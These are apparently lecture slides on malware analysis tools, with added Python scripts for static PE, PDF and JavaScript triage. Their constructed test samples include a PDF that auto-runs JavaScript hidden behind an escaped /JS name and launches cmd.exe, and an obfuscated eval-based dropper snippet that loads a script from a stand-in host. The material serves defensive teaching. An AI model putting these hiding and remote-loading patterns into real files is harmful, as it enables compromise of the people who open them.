Matthew Stephen
csg.utdallas.edu
- Portable Executables (PEs)
- Java apps/applets
- Documents (PDF, DOC, etc.)
- JavaScript
- Shellcode
- Flash (SWF)
Portable Executables (PEs)
- Executables, object code, and DLLs
- Used in 32- and 64-bit Windows
- Several headers and sections: .text, .data, .reloc, etc.
- Many file extensions: .exe, .dll, .sys, .scr, .cpl, .ocx, .drv

- Check against AV signatures
  - VirusTotal.com: upload the file or search by hash
- Determine packing (if any)
  - PEiD detects several types of packing
  - UPX is one of the most common packers
- Strings / look at resources (Resource Hacker)
  - Readable strings within a binary
  - Program icons, menu bars, dialog windows, etc.

[Screenshot: VirusTotal results]

- PE viewers display header and section info: PEview, PEBrowse, PE Explorer, PEframe, CFF Explorer
- Dependencies (modules/libraries): Dependency Walker shows which functions are imported from each external module
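As an added example (not part of the original slides), the Python script below does by hand a slice of what the PE viewers, PEiD, strings, and a VirusTotal hash lookup do: it parses the DOS, COFF and optional headers and the section table, flags UPX-style section names and other packer tells, pulls printable strings and URLs, and hashes the file for a hash search. The image it builds is a constructed header skeleton with UPX0/UPX1 sections for demonstration only (not a loadable program), and the packer section-name list is a small assumed set.

```python
"""Static PE triage: headers, section table, packer tells, strings, hashes.
Standard library only. build_sample() returns a constructed PE32 header skeleton
with UPX-style sections for the demo; it is not a runnable program."""
import hashlib
import re
import struct

MACHINE_NAMES = {0x14C: "x86", 0x8664: "x64"}
IMAGE_FILE_DLL = 0x2000
# Assumed list: section names left behind by UPX and a few other common packers
PACKER_SECTIONS = {b"UPX0", b"UPX1", b"UPX2", b".aspack", b".adata",
                   b".petite", b".MPRESS1", b".themida"}


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional header -> sections."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt_off = pe_off + 24
    (magic,) = struct.unpack_from("<H", data, opt_off)        # 0x10B = PE32, 0x20B = PE32+
    (entry,) = struct.unpack_from("<I", data, opt_off + 16)   # AddressOfEntryPoint, same offset in both
    sections = []
    for i in range(nsec):
        name, vsize, vaddr, rawsize, rawptr, _, _, _, _, flags = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize, "vaddr": vaddr,
                         "rawsize": rawsize, "rawptr": rawptr, "flags": flags})
    return {"machine": MACHINE_NAMES.get(machine, hex(machine)), "pe32plus": magic == 0x20B,
            "timestamp": stamp, "entry": entry, "is_dll": bool(chars & IMAGE_FILE_DLL),
            "sections": sections}


def packer_hints(pe: dict) -> list:
    """Cheap PEiD-style heuristics. Any hit means: unpack before trusting strings/imports."""
    hints = []
    for s in pe["sections"]:
        if s["name"] in PACKER_SECTIONS:
            hints.append("packer section name %s" % s["name"].decode())
        if s["rawsize"] == 0 and s["vsize"] > 0:
            hints.append("%s has no raw data but %#x bytes virtual (filled at run time)"
                         % (s["name"].decode(), s["vsize"]))
    ep = pe["entry"]
    ep_sec = next((s for s in pe["sections"]
                   if s["vaddr"] <= ep < s["vaddr"] + max(s["vsize"], s["rawsize"])), None)
    if ep_sec is None:
        hints.append("entry point %#x lies outside every section" % ep)
    elif ep_sec["name"] not in (b".text", b"CODE"):
        hints.append("entry point %#x in section %s, not .text" % (ep, ep_sec["name"].decode()))
    return hints


def strings(data: bytes, min_len: int = 4) -> list:
    """Printable ASCII runs, like the Sysinternals strings tool (ASCII only, no UTF-16)."""
    return [m.group().decode() for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256, enough to search VirusTotal without uploading the sample."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}


def triage(data: bytes) -> dict:
    pe = parse_pe(data)
    return {"pe": pe, "hints": packer_hints(pe), "hashes": hashes(data),
            "urls": [s for s in strings(data) if s.startswith(("http://", "https://"))]}


def build_sample() -> bytes:
    """Constructed PE32 header skeleton with UPX-style sections (demo input, not loadable)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0x5F5E1000, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, 0x2010)                # entry point inside UPX1
    upx0 = struct.pack("<8sIIIIIIHHI", b"UPX0", 0x1000, 0x1000, 0, 0, 0, 0, 0, 0, 0xE0000080)
    upx1 = struct.pack("<8sIIIIIIHHI", b"UPX1", 0x1000, 0x2000, 0x80, 0x200, 0, 0, 0, 0, 0xE0000040)
    body = (b"\x55\x8b\xecThis program cannot be run in DOS mode\0UPX!\0"
            b"http://example.invalid/payload\0").ljust(0x80, b"\0")
    return (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + upx0 + upx1).ljust(0x200, b"\0") + body


if __name__ == "__main__":
    for key, value in triage(build_sample()).items():
        print(key, value)
```

Run it against a real sample with `triage(open(path, "rb").read())`; a non-empty hints list is the cue to unpack (for UPX, `upx -d`) before reading the strings or the import table, since both are hidden until then.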
- Registry: view changes made in the Registry
  - Regshot: compare Registry snapshots taken before and after running the sample
  - Autoruns: view startup applications
- Process
  - PMDump, ProcDump: create a dump of an active process
  - Process Monitor: shows file system, Registry, and process activity
  - Process Explorer, Process Hacker: show trees of running processes

[Screenshot: Registry changes recorded by Regshot]

[Screenshot: Process Monitor capturing network, file, and Registry activity]

- Network
  - Mandiant ApateDNS: control DNS responses
  - Wireshark: capture/browse network traffic
  - McAfee Attacker: TCP/UDP port listener
  - FakeNet: simulates a network and fakes the files/responses the malware asks for
  - CurrPorts: lists open ports and the processes that own them
  - TCPView: shows newly opened/closed endpoints
  - Also: SmartSniff, SocketSniff, Network Monitor, SuperScan, NetworkMiner, etc.

[Screenshot: FakeNet capturing network traffic]

- Memory
  - Mandiant Memoryze: create and analyze memory images
  - Volatility: shows open network sockets and connections, open files for each process, DLLs loaded by each process, etc.
- CaptureBAT: behavioral analysis tool that monitors file, Registry, network, and process activity

[Screenshot: CaptureBAT detecting activity]
Java Apps/Applets
- Desktop applications and applets
- File extensions: .jar, .class

- Mostly the same as PE file analysis
- Differences:
  - Obfuscation: string building, meaningless variable names
  - Decompilation: JAD, JD-GUI

[Screenshot: decompiled, obfuscated Java in which both s and t end up set to os.name]

- Differences with PE analysis when running the sample:
  - The process is java.exe or javaw.exe rather than something like SomeProgram.exe
  - Use jps and jconsole to tell multiple Java processes apart
Documents
- Adobe files: .pdf
- Microsoft files: .doc, .ppt, etc.
- Embedded files or code

PDF tools
- pdfid.py: identify the tags (names such as /JS and /OpenAction) contained in the file
- pdf-parser.py: can extract embedded objects
- pyew.py: search for URLs, shellcode, etc.
- swf_mastah.py: Flash file extraction
- JSunpack pdf.py: JavaScript detection
- peepdf.py: encryption detection
- PDF Stream Dumper: checks for known vulnerabilities

[Screenshot: using pyew.py]
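Added example, not from the slides and not the code of any tool named above: a pdfid-style scanner in Python. It undoes the #xx name-escape trick (so /J#53 counts as /JS), counts the JavaScript- and auto-run-related names, and pulls inline JavaScript out of literal and hex strings much as pdf-parser.py would display it. SAMPLE_PDF is a constructed file; JavaScript stored in a referenced, compressed stream is deliberately not followed.

```python
"""pdfid/pdf-parser style PDF triage. Standard library only; SAMPLE_PDF is constructed."""
import re
from collections import Counter

# Names pdfid.py reports; /JS or /JavaScript next to /OpenAction or /AA means auto-run code
SUSPECT_NAMES = [b"/JS", b"/JavaScript", b"/OpenAction", b"/AA", b"/Launch",
                 b"/ObjStm", b"/EmbeddedFile", b"/RichMedia", b"/AcroForm", b"/XFA"]
NAME_TOKEN = re.compile(rb"/[^\s/\[\]<>(){}%]*")   # a PDF name runs until a delimiter


def unescape_name(m):
    """Resolve #xx escapes inside one name token so /J#53 is counted as /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda h: bytes([int(h.group(1), 16)]), m.group())


def read_literal(data: bytes, i: int) -> tuple:
    """Read the (...) literal string at data[i]: parens nest, backslash escapes."""
    simple = {b"n": b"\n", b"r": b"\r", b"t": b"\t"}
    depth, out, j = 0, bytearray(), i
    while j < len(data):
        c = data[j:j + 1]
        if c == b"\\":
            nxt = data[j + 1:j + 2]
            out += simple.get(nxt, nxt)
            j += 2
            continue
        if c == b"(":
            depth += 1
            if depth == 1:
                j += 1
                continue
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), j + 1
        out += c
        j += 1
    raise ValueError("unterminated literal string")


def read_hex(data: bytes, i: int) -> tuple:
    """Read the <...> hex string at data[i]; a trailing odd digit is padded with 0."""
    end = data.index(b">", i)
    digits = re.sub(rb"\s", b"", data[i + 1:end])
    return bytes.fromhex((digits + b"0" if len(digits) % 2 else digits).decode()), end + 1


def extract_js(data: bytes) -> list:
    """Inline /JS values only. JS held in a referenced stream (/JS 5 0 R, usually
    FlateDecode) is not followed here; that is what pdf-parser.py's object dump is for."""
    found = []
    for m in re.finditer(rb"/JS\s*", data):
        i = m.end()
        if data[i:i + 1] == b"(":
            found.append(read_literal(data, i)[0])
        elif data[i:i + 1] == b"<" and data[i:i + 2] != b"<<":
            found.append(read_hex(data, i)[0])
    return found


def scan_pdf(data: bytes) -> dict:
    normalized = NAME_TOKEN.sub(unescape_name, data)
    names = Counter(NAME_TOKEN.findall(normalized))
    counts = {n.decode(): names.get(n, 0) for n in SUSPECT_NAMES}
    verdict = []
    if (counts["/JS"] or counts["/JavaScript"]) and (counts["/OpenAction"] or counts["/AA"]):
        verdict.append("JavaScript wired to an auto-run action")
    if counts["/Launch"]:
        verdict.append("/Launch action (starts an external program)")
    return {
        "valid_header": data.startswith(b"%PDF-"),
        "objects": len(re.findall(rb"\b\d+\s+\d+\s+obj\b", data)),
        "streams": len(re.findall(rb"(?<!end)stream\b", data)),
        "eof_markers": data.count(b"%%EOF"),     # more than one: incremental updates appended
        "escaped_names": len(re.findall(rb"/[^\s/\[\]<>(){}%]*#[0-9A-Fa-f]{2}", data)),
        "counts": counts,
        "js": extract_js(normalized),
        "verdict": verdict,
    }


# Constructed sample: JavaScript hidden behind an escaped name and run from /OpenAction
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /S /JavaScript /J#53 (var s = unescape("%u9090%u9090"); app.alert(s.length)) >>
endobj
4 0 obj
<< /Type /Action /S /Launch /F (cmd.exe) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for key, value in scan_pdf(SAMPLE_PDF).items():
        print(key, value)
```

The escaped-name count is itself a signal: legitimate producers almost never write /J#53, so a non-zero value means someone was trying to dodge a naive grep for /JS.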
Office document tools
- OfficeMalScanner: scans for malicious traces (shellcode heuristics, PE files, or embedded OLE streams); its brute-force mode finds encrypted embedded files
- OffVis: only looks for patched vulnerabilities
- pyolescanner.py: looks for shellcode, embedded executables, and API presence; can also use brute force
JavaScript
- Used in most web pages; .js file extension if externally referenced
- Can be embedded in PDF documents

- Deobfuscate: replace hexadecimal and escaped characters with readable text
- Beautify: insert white space
- Evaluate the evil eval() function

- Malzilla: decodes/deobfuscates scripts and evaluates eval() calls in its own JavaScript engine instead of a browser
- JSunpack
- JSBeautifier

[Screenshot: beautified JavaScript]
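Added example (my own code, not the author's and not taken from Malzilla, JSunpack or JSBeautifier) that carries out the deobfuscate / beautify / evaluate-eval steps above in Python without executing the script: it decodes \xNN, \uNNNN and unescape("%NN") escapes, folds String.fromCharCode(...) and "a"+"b" concatenations, inlines single-assignment string variables, swaps the final eval() sink for console.log() so the second stage is shown rather than run, and re-indents. SAMPLE_JS is a constructed dropper-style snippet.

```python
"""Static JavaScript deobfuscation. Nothing is executed; SAMPLE_JS is constructed."""
import re

LIT = r'"(?:[^"\\]|\\.)*"'                 # a double-quoted literal, escapes allowed


def segments(js):
    """Split source into (is_string, text) pieces so rewrites can skip string bodies."""
    out, i, start = [], 0, 0
    while i < len(js):
        if js[i] in "\"'":
            q, j = js[i], i + 1
            while j < len(js) and js[j] != q:
                j += 2 if js[j] == "\\" else 1
            out.append((False, js[start:i]))
            out.append((True, js[i:j + 1]))
            i = start = j + 1
        else:
            i += 1
    out.append((False, js[start:]))
    return out


def quote(text):
    return '"' + text.replace("\\", "\\\\").replace('"', '\\"') + '"'


def decode_escapes(js):
    """\\xNN and \\uNNNN anywhere; %NN / %uNNNN only inside unescape("...") calls."""
    js = re.sub(r"\\x([0-9A-Fa-f]{2})|\\u([0-9A-Fa-f]{4})",
                lambda m: chr(int(m.group(1) or m.group(2), 16)), js)
    def pct(m):
        return quote(re.sub(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
                            lambda h: chr(int(h.group(1) or h.group(2), 16)), m.group(1)[1:-1]))
    return re.sub(r"unescape\(\s*(" + LIT + r")\s*\)", pct, js)


def fold_fromcharcode(js):
    """String.fromCharCode(104,105) -> "hi" when every argument is a numeric literal."""
    return re.sub(r"String\.fromCharCode\(\s*([\d\s,]+)\)",
                  lambda m: quote("".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))), js)


def fold_concat(js):
    """"ev" + "al" -> "eval", repeated until nothing changes."""
    pattern = re.compile(r"(" + LIT + r")\s*\+\s*(" + LIT + r")")
    while True:
        new = pattern.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], js)
        if new == js:
            return js
        js = new


def propagate_constants(js):
    """Inline var x = "literal"; when x is assigned exactly once (with =), drop the declaration."""
    code = "".join(seg for is_str, seg in segments(js) if not is_str)
    decls = {name: lit for name, lit in re.findall(r"var\s+(\w+)\s*=\s*(" + LIT + r")\s*;", js)
             if len(re.findall(r"\b%s\s*=(?!=)" % re.escape(name), code)) == 1}
    if not decls:
        return js
    js = re.sub(r"var\s+(\w+)\s*=\s*" + LIT + r"\s*;",
                lambda m: "" if m.group(1) in decls else m.group(0), js)
    ref = re.compile(r"\b(" + "|".join(map(re.escape, decls)) + r")\b")
    return "".join(seg if is_str else ref.sub(lambda m: decls[m.group(1)], seg)
                   for is_str, seg in segments(js))


def neutralize_eval(js):
    """Malzilla's trick: make the eval sink print its argument instead of executing it."""
    js = re.sub(r'\b(?:window|this|self)\["eval"\]', "eval", js)
    return re.sub(r"\beval\s*\(", "console.log(", js)


def beautify(js):
    """Line breaks and two-space indent after ; { } outside strings (simplified; breaks for(;;))."""
    out, depth = [], 0
    for is_str, seg in segments(js):
        if is_str:
            out.append(seg)
            continue
        for ch in seg:
            if ch == "}":
                depth = max(depth - 1, 0)
                out.append("\n" + "  " * depth + "}\n" + "  " * depth)
                continue
            out.append(ch)
            if ch in ";{":
                depth += ch == "{"
                out.append("\n" + "  " * depth)
    return "\n".join(line.rstrip() for line in "".join(out).splitlines() if line.strip())


def deobfuscate(js):
    js = fold_fromcharcode(decode_escapes(js))
    js = fold_concat(propagate_constants(js))
    return beautify(neutralize_eval(js))


# Constructed sample: builds "document.write('<script src=...>')" and feeds it to window["eval"]
SAMPLE_JS = r'''var a=String.fromCharCode(100,111,99,117,109,101,110,116);var b="\x77\x72\x69\x74\x65";var c=unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%65%78%61%6D%70%6C%65%2E%69%6E%76%61%6C%69%64%2F%78%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E");window["ev"+"al"](a+"."+b+"('"+c+"')");'''

if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
```

Each pass is a plain text rewrite, so a sample that builds its second stage from arithmetic, arguments.callee checks or DOM values will come out only partly decoded; that is the point at which a sandboxed engine (Malzilla, JSunpack) is needed.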
Shellcode
- Shellcode2exe: embeds the given shellcode into an executable file so it can be debugged
- ConvertShellcode: disassembles shellcode into x86 assembly
Flash (SWF)
- Used on many web pages; .swf file extension
- Can be embedded in PDF files

- Flare: extracts scripts from a SWF file
- RABCDAsm (Robust ActionScript Bytecode Disassembler): extracts and disassembles scripts
- SWFDump: extracts images, fonts, sounds, etc.
- SWFStrings: scans a SWF for text data
References
- http://practicalmalwareanalysis.com/
- http://zeltser.com/
- http://isc.sans.edu/

Many free tools:
- Mandiant.com
- McAfee.com
- Sysinternals.com
- NirSoft.net

Also check out the tools listed in this presentation.